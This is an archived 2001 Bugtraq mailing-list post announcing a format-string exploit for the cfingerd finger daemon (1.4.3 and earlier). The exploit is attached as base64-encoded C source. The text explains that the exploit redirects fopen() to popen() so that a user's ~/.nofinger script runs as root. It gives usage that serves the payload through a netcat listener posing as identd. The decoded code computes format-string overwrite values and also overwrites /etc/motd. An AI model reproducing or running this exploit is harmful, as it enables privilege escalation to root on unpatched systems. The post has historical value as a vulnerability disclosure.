[21466] in bugtraq
Happy 3 month anniversary cfingerd remote bug!
daemon@ATHENA.MIT.EDU (zen-parse@gmx.net)
Wed Jul 11 20:02:49 2001
Date: Thu, 12 Jul 2001 04:51:24 +1200 (NZST)
From: <zen-parse@gmx.net>
To: <bugtraq@securityfocus.com>
Message-ID: <Pine.LNX.4.33.0107120434070.10330-200000@clarity.local>
MIME-Version: 1.0
Content-Type: MULTIPART/MIXED; BOUNDARY="-1463783680-1062882213-994870284=:10330"
---1463783680-1062882213-994870284=:10330
Content-Type: TEXT/PLAIN; charset=US-ASCII
Remotish / localish exploit.
I wrote this last night, unaware someone else was going to post something
today.
Here is another exploit for the format string problem in cfingerd<=1.4.3,
using a slightly different method for exploiting it. Anti script-kiddied
by me being lazy.
Exploit redirects fopen() call to popen() and executes code from
~/.nofinger
Read the comments.
-- zen-parse
M4D PR0PZ T0 :
Steven for showing me da bugz
noid 4 b3in6 7h3r3 wh3n no1 3153 w4z
grue 4 lurking, g00bER 4 something
and the rest of #roothat @ irc.pulltheplug.com
4150 70 mp3.com 4 http://mp3.com/cosv
---1463783680-1062882213-994870284=:10330
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="idcf.c"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.LNX.4.33.0107120451230.10330@clarity.local>
Content-Description:
Content-Disposition: attachment; filename="idcf.c"
LyoqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKg0KDQpodHRwOi8vd3d3LmluZm9kcm9tLmZmaXMu
ZGUvcHJvamVjdHMvY2ZpbmdlcmQvIHN0YXRlczoNCg0KICBDZmluZ2VyZCBp
cyBhIGZyZWUgYW5kIHNlY3VyZSBmaW5nZXIgZGFlbW9uIHJlcGxhY2VtZW50
IGZvciANCiAgc3RhbmRhcmQgZmluZ2VyIGRhZW1vbnMgc3VjaCBhcyBHTlUg
ZmluZ2VyZCBvciBNSVQgZmluZ2VyZC4NCg0KQXByaWwgMTEsIDIwMDEgTWVn
eWVyIExhc3psbyA8IGFidWxsYUBmcmVlbWFpbC5odSA+IHdyb3RlOg0KDQog
IEluIDMgd29yZHM6IFJFTU9URSBST09UIFZVTE5FUkFCSUxJVFkNCg0KDQog
ICBpZGNmLmMgLSBKdWx5IDExIDIwMDEgLSBoYXBweSAzIG1vbnRoIGFubml2
ZXJzYXJ5IQ0KDQogICANCiAgIGNmaW5nZXJkIDEuNC4zIGlkZW50ZCBiYXNl
ZCBsb2NhbGlzaCBleHBsb2l0IDtdDQogICBubyBzaGVsbGNvZGUgcmVxdWly
ZWQgaWYgeW91IGhhdmUgYSBsb2NhbCBhY2NvdW50DQogICBtYWtlIGEgc2Ny
aXB0IGluIH4vLm5vZmluZ2VyIHRoYXQgeW91IHdhbnQgdG8gYmUNCiAgIGV4
ZWN1dGVkIGFzIHJvb3QuDQoNCiAgIGl0IHdvcmtzIGJ5IGRpdmVydGluZyB0
aGUgZm9wZW4gY2FsbCB0byBwb3Blbi4gb2YgDQogICBjb3Vyc2UgaXQgd29u
J3QgaGVscCBpZiB5b3UgZG9uJ3QgYWxyZWFkeSBoYXZlIGEgDQogICBsb2Nh
bCBhY2NvdW50IGJ1dCB3ZWxsLCBpdHMganVzdCBhIHByb29mIG9mIGNvbmNl
cHQgDQogICBhbmQgSSB0aGluayBpdCdzIGN1dGUsIGFuZCB0aGUgbW9yZSBl
eHBsb2l0cyB0aGVyZQ0KICAgYXJlIGFnYWluc3QgYW4gdW5wYXRjaGVkIHN5
c3RlbSwgdGhlIG1vcmUgbGlrZWx5IChJDQogICBob3BlKSBpdCB3aWxsIGdl
dCBwYXRjaGVkLiBXb3VsZCBiZSBuaWNlIGlmIGl0IHdvcmtlZA0KICAgdGhh
dCB3YXkgYW55d2F5Lg0KICAgDQogICAuL2lkY2Z8bmMgLWwgLXAgMTEzIA0K
ICAgb24gYSBib3ggeW91IGhhdmUgcm9vdCBvbiwgYW5kIGZpbmdlciB5b3VA
b3RoZXJob3N0DQogICB0byB1c2UuDQoNCiAgIHRoaXMgaXMgaGFyZGNvZGVk
IGZvciBmb3VyIGxldHRlciBuYW1lcywgYnV0IHNob3VsZG4ndA0KICAgcmVx
dWlyZSByb2NrZXQgc2NpZW5jZSB0byBtYWtlIHdvcmsgZm9yIG90aGVycy4N
CiAgIEhpbnQ6ICBvZmZzZXQgYW5kIHBhZGRpbmcgOiBmb3JtYXQgc3RyaW5n
cyBhcmUgZnVuLg0KDQogICANCg0KICAgICAgICAgICAgICAgICAgIE00RCBQ
UjBQWiBUMCA6DQoNCiAgICAgICAgICAgU3RldmVuIGZvciBzaG93aW5nIG1l
IGRhIGJ1Z3oNCiAgICAgICAgbm9pZCA0IGIzaW42IDdoM3IzIHdoM24gbm8x
IDMxNTMgdzR6DQogICAgICAgIGdydWUgNCBsdXJraW5nLCAgZzAwYkVSIDQg
c29tZXRoaW5nDQogICAgIGFuZCB0aGUgcmVzdCBvZiAjcm9vdGhhdCBAIGly
Yy5wdWxsdGhlcGx1Zy5jb20NCg0KICAgICAgIDQxNTAgNzAgbXAzLmNvbSA0
IGh0dHA6Ly9tcDMuY29tL2Nvc3YNCg0KKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKiovDQoNCi8v
IFRoZSBvZmZzZXRzIGFyZSBmcm9tIGEgdmVyc2lvbiBpIGNvbXBpbGVkIGp1
c3QgdG8NCi8vIHRlc3QgdGhlIHZ1bG5lcmFiaWxpdHkgYW5kIHNvIHdpbGwg
bW9zdCBsaWtlbHkgbm90DQovLyB3b3JrIGZvciB5b3UuDQoNCi8vIGdldCB0
aGlzIGZyb20gb2JqZHVtcCAtUiBjZmluZ2VyZWR8Z3JlcCBmb3Blbg0KI2Rl
ZmluZSBPVkVSIDB4MDgwNTUzMmMNCi8vIGdldCB0aGlzIGZyb20gb2JqZHVt
cCAtUiBjZmluZ2VyZHxncmVwIHBvcGVuDQovLyBhbmQgdGhlbiBnZGIgY2Zp
bmdlcmQgIGFuZCB4L3ggMHhvZmZzZXQgZnJvbSBvYmpkdW1wDQojZGVmaW5l
IFdJVEggMHgwODA0OTFiYQ0KDQojaW5jbHVkZSA8c3RkaW8uaD4NCm1haW4o
aW50IGFyZ2MsY2hhciphcmd2W10pDQp7DQogaW50IHowPTAsb3Zydz1PVkVS
OyAgICAvLyBhZGRyZXNzIHRvIG92ZXJ3cml0ZSB3aXRoIHBhc3MgMQ0KIGlu
dCB6MT0wLG92cncxPU9WRVIrMjsgLy8gYWRkcmVzcyB0byBvdmVyd3JpdGUg
d2l0aCBwYXNzIDINCiBpbnQgc2xlbj1zdHJsZW4oImV2aWwgZmluZ2VyZWQg
ZnJvbSAiKSs5OyANCiBpbnQgYWRkcj1XSVRIOyAgICAgICAgIC8vIHdoYXQg
dG8gb3ZlcndyaXRlIHRoZSBhZGRyZXNzIHdpdGgNCiBpbnQgb2Zmc2V0PTIw
OyAgICAgICAgIC8vIHdoZXJlIHRoZSBmaXJzdCBhZGRyZXNzIGlzIG9uIHRo
ZSBzdGFjaw0KIGludCBhMSxhMjsgICAgICAgICAgICAgDQogRklMRSAqZjsN
CiBmPWZvcGVuKCIvZXRjL21vdGQiLCJ3KyIpOw0KIGlmKCFmKQ0KIHsgDQog
IGZwcmludGYoIllvdSBtdXN0IGJlIHJvb3QgdG8gdXNlIHRoaXMgZXhwbG9p
dC5cbiIpOw0KICBleGl0KDEpOw0KIH0NCiBhMT0oYWRkciYweDAwMGZmZmYp
LXNsZW47ICAgICAgICAgICAgICAgICAvLyAxc3QgbnVtYmVyIG9mIGJ5dGVz
DQogYTI9KDB4MTAwMDArKGFkZHI+PjE2KS1hMS1zbGVuKSYweDBmZmZmOyAg
Ly8gMm5kIG51bWJlciBvZiBieXRlcw0KIHByaW50ZigiOjo6QSVzJXMiLCZv
dnJ3LCZvdnJ3MSk7ICAgICAgICAgIC8vIGhlYWRlci9wYWRkaW5nL2FkZHJl
c3Nlcw0KIHByaW50ZigiJSUldXglJSVkJGhuJSUldXglJSVkJGhuXG4iICAg
ICAgIC8vIGZvcm1hdHN0cmluZyBpdHNlbGYNCiAgICAgICAgLGExLG9mZnNl
dCxhMixvZmZzZXQrMSk7IA0KIGZwcmludGYoc3RkZXJyLCJWaXNpdCBodHRw
Oi8vbXAzLmNvbS9jb3N2LyB0b2RheSFcbiIpOw0KIGZwcmludGYoc3RkZXJy
LCJBbmQgbWViZSB2aXNpdCB5b3VyIGFjY291bnQgb24gdGhlIG90aGVyIG1h
Y2hpbmUuXG4iKTsNCiBmcHJpbnRmKHN0ZGVyciwiYWZ0ZXIgeW91IGZpbmdl
ciBpdC5cbiIpOw0KIGZwcmludGYoZiwiVmlzaXQgaHR0cDovL21wMy5jb20v
Y29zdi8gdG9kYXkhXG4iKTsNCiBmY2xvc2UoZik7DQogDQp9DQo=
---1463783680-1062882213-994870284=:10330--
